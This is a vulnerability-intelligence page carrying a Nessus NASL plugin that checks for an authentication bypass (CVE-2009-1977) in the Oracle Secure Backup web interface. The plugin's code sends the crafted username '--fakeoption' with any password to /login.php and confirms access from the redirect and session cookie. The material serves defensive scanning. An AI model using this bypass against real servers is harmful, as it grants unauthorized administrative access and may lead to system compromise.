Oracle Secure Backup Administration Server Authentication Bypas
Reporter | Title | Published | Views | Family All 18 |
---|---|---|---|---|
Cvelist | CVE-2009-1977 | 14 Jul 200923:00 | – | cvelist |
Prion | Authentication flaw | 14 Jul 200923:30 | – | prion |
Check Point Advisories | Oracle Secure Backup Administration Server Authentication Bypass (CVE-2009-1977) | 27 Aug 200900:00 | – | checkpoint_advisories |
securityvulns | ZDI-09-058: Oracle Secure Backup Administration Server Authentication Bypass Vulnerability | 19 Aug 200900:00 | – | securityvulns |
securityvulns | Oracle quarterly security update | 16 Feb 201000:00 | – | securityvulns |
securityvulns | Oracle Critical Patch Update Advisory - July 2009 | 16 Jul 200900:00 | – | securityvulns |
Zero Day Initiative | Oracle Secure Backup Administration Server Authentication Bypass Vulnerability | 18 Aug 200900:00 | – | zdi |
NVD | CVE-2009-1977 | 14 Jul 200923:30 | – | nvd |
CVE | CVE-2009-1977 | 14 Jul 200923:30 | – | cve |
0day.today | Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit | 14 Sep 200900:00 | – | zdt |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(40989);
script_version("1.22");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2009-1977");
script_bugtraq_id(35672);
script_xref(name:"EDB-ID", value:"9652");
script_name(english:"Oracle Secure Backup Administration Server Authentication Bypass");
script_summary(english:"Tries to generate a SQL error");
script_set_attribute( attribute:"synopsis", value:
"The remote web server contains a PHP application that allows an
attacker to bypass authentication." );
script_set_attribute( attribute:"description", value:
"The remote web server is the Administration Server for Oracle Secure
Backup, a centralized tape backup management software application.
The installed version of Oracle Secure Backup allows a remote attacker
to bypass authentication using a specially crafted username, such as
'--fakeoption'.
An unauthenticated, remote attacker can leverage this issue to bypass
authentication and gain administrative access to the application.
Under Windows, this can lead to a complete system compromise.
Note that this install is also likely to be affected by multiple
command injection vulnerabilities, although Nessus has not checked for
them." );
script_set_attribute( attribute:"see_also", value:
"https://www.zerodayinitiative.com/advisories/ZDI-09-058/" );
script_set_attribute( attribute:"see_also", value:
"https://seclists.org/fulldisclosure/2009/Aug/249" );
script_set_attribute( attribute:"see_also", value:
"https://www.oracle.com/technetwork/topics/security/cpujul2009-091332.html" );
script_set_attribute( attribute:"solution", value:
"Upgrade to Oracle Secure Backup version 10.2.0.3 or later." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"Oracle Secure Backup 10.3.0.1 RCE");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"cpe",value:"cpe:/a:oracle:secure_backup");
script_set_attribute(
attribute:"vuln_publication_date",
value:"2009/08/18"
);
script_set_attribute(
attribute:"patch_publication_date",
value:"2009/07/14"
);
script_set_attribute(
attribute:"plugin_publication_date",
value:"2009/09/14"
);
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_require_ports("Services/www", 443);
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:443);
if (!can_host_php(port:port)) exit(0, "Web server does not support PHP scripts.");
# nb: the username can be anything starting with '--'.
# and the password can be anything.
user = "--fakeoption";
pass = "NESSUS";
# Make sure the affected script exists.
url = "/login.php";
res = http_send_recv3(port:port, method:"GET", item:url);
if (isnull(res)) exit(1, "The web server failed to respond.");
if (
"<title>Oracle Secure Backup Web Interface</title>" >< res[2] &&
'<input name="uname" ' >< res[2]
)
{
postdata = string(
"button=Login&",
"attempt=1&",
"mode=&",
"tab=&",
"uname=", user, "&",
"passwd=", pass
);
req = http_mk_post_req(
port : port,
item : url,
data : postdata,
content_type: "application/x-www-form-urlencoded"
);
res = http_send_recv_req(port:port, req:req, exit_on_fail: 1);
hdrs = parse_http_headers(status_line:res[0], headers:res[1]);
if (isnull(hdrs['$code'])) code = 0;
else code = hdrs['$code'];
if (isnull(hdrs['set-cookie'])) cookies = "";
else cookies = hdrs['set-cookie'];
if (isnull(hdrs['location'])) location = "";
else location = hdrs['location'];
# There's a problem if ...
if (
# we're redirected and ...
code == 302 &&
"/index.php?tab=&mode=" >< location &&
# a session cookie was set.
"PHPSESSID=" >< cookies
)
{
if (report_verbosity > 0)
{
req_str = http_mk_buffer_from_req(req:req);
report = string(
"\n",
"Nessus was able to gain access using the following credentials :\n",
"\n",
" URL : ", build_url(port:port, qs:url), "\n",
" User : ", user, "\n",
" Password : ", pass, "\n"
);
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
}
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo